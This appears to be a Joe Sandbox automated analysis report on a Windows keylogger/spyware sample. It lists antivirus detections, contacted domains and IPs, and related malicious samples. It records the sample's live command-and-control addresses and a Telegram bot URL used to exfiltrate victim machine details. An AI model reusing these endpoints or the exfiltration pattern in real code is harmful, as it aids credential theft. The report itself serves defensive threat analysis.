                W2k2NLSvja.exe74%ReversingLabsWin32.Ransomware.VIPKeylogger
                W2k2NLSvja.exe100%AviraTR/AD.ShellcodeCrypter.dtpgi
                W2k2NLSvja.exe100%AviraTR/Agent.tciod
                W2k2NLSvja.exe100%AviraTR/Agent.tciod
                W2k2NLSvja.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://x1.c.l30%Avira URL Cloudsafe
                http://r11.o.M0%Avira URL Cloudsafe
                http://mail.tradolgt.com0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.97.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    mail.tradolgt.com
                    208.91.199.115
                    truetrue
                      unknown
                      checkip.dyndns.com
                      132.226.247.73
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:43:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://r11.o.lencr.org0#RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.000000000684E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006849000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/botW2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              http://r11.i.lencr.org/0RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.000000000684E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006849000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://r11.o.MRegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://aborters.duckdns.org:8081W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.l3RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anotherarmy.dns.army:8081W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006845000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006841000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0RegSvcs.exe, 00000002.00000002.4488752677.0000000006780000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006845000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.0000000006841000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484266848.000000000141A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4488752677.00000000067FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.org/qW2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000032F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000333E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://mail.tradolgt.comRegSvcs.exe, 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000357C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4485162305.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.0000000003364000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.000000000333E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4487012044.00000000042A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedW2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://reallyfreegeoip.org/xml/W2k2NLSvja.exe, 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4485162305.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            149.154.167.220
                                                                                            api.telegram.orgUnited Kingdom
                                                                                            62041TELEGRAMRUfalse
                                                                                            188.114.97.3
                                                                                            reallyfreegeoip.orgEuropean Union
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            208.91.199.115
                                                                                            mail.tradolgt.comUnited States
                                                                                            394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                            132.226.247.73
                                                                                            checkip.dyndns.comUnited States
                                                                                            16989UTMEMUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1583667
                                                                                            Start date and time:2025-01-03 09:48:07 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 7m 34s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:5
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:W2k2NLSvja.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:3C81CD20323C282181D40FA0E8AB7B66DFD46EDD7BAFC3D6ABEB072420B314FE.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/4@4/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 58
                                                                                            • Number of non-executed functions: 269
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            TimeTypeDescription
                                                                                            03:49:00API Interceptor10759460x Sleep call for process: RegSvcs.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            149.154.167.220FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                    eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                188.114.97.3dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                • /api/get/free
                                                                                                                dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                • /api/get/free
                                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.rgenerousrs.store/o362/
                                                                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.beylikduzu616161.xyz/2nga/
                                                                                                                Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                • paste.ee/d/lxvbq
                                                                                                                Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                208.91.199.115payment slip.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  Credit_n.mveettil_Payment Schedule-Ref -PG-198062607.file.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    https://pkrhzxtlvs.scscollege.org/?dshhef7dyi-7c17jao-xt77v0w0o-qaglkg6oqgym5fffr1d51yfx11tqo0aczuqkhl6vwlimlntj-kn5c1~7v70x5thdvj7c1r1~56f38w80yeuur2e~myjmfimjgczyryf10fucpv~p0j241ano0rhvac-qzvpmr6b6kkd0xqdcikn5h-0xfvpwdyu9~062zk0tklf~vbjbpqf~p4mtkgudniqu01qy8mntriuy9cfvhcd-2-xov9j7c1sd-2shqdrvjte8rl0n7bj8myx79rjtx6w8c6hrruf9k1suacaxma0kc-huo3t4p31t0uzu3llizpbpxat3w7qvajx9yxo23u32v4t1ju-0au-4pm15pgw0f123y09rg7-v25bw7mkndt~3aa8f8mo-bpg-9tv7enovx013t17dqlxwapfe4yw18v23ksgo54ysett0k4aqxsutj5-5yz~upoxhcry3v9tvuu6evg6n0oxzhr55ng6otqvh~33id63esxp30~-hrwrrjubs6565g3-k2iucun085yf7tpbc6nhfuylze9-51xvd8070bt-i6munyirhyuo7lwbhk0y1-y7emsq6qbpfhyeghukzbtzizqkcb6niwnhjsj0s~5~~dta42odpz4j1xtlfjd0yksq6e-8e6a2bip7w6xkcswynrka-vv0meod4ypnio7rsa6nvpgb1diulznmdl3htq4341bo~ldqypza~16btlefrzje6w8cadgndkp~n0uep~wno30toq~lcjds=value&url=memindustries.com/host/hjlwehjwhnkewhj/Y2VsbGlvdHRAd2lja2Vyc21pdGguY29tGet hashmaliciousUnknownBrowse
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      reallyfreegeoip.orgFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      mail.tradolgt.compayment slip.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.199.115
                                                                                                                      checkip.dyndns.comFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      api.telegram.orgFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRUFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CLOUDFLARENETUSFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 104.20.4.235
                                                                                                                      https://myburbank-uat.3didemo.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.26.13.57
                                                                                                                      hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                                                                      • 172.67.19.24
                                                                                                                      http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.96.1
                                                                                                                      http://adflowtube.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      UTMEMUSFACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 132.226.227.252
                                                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.8.169
                                                                                                                      Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 132.226.247.73
                                                                                                                      PUBLIC-DOMAIN-REGISTRYUSimage.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 208.91.198.176
                                                                                                                      YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                      • 208.91.198.106
                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 119.18.54.39
                                                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      s0zqlmETpm.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.10.240.70
                                                                                                                      Quote_8714.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 199.79.62.115
                                                                                                                      S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 103.53.42.63
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
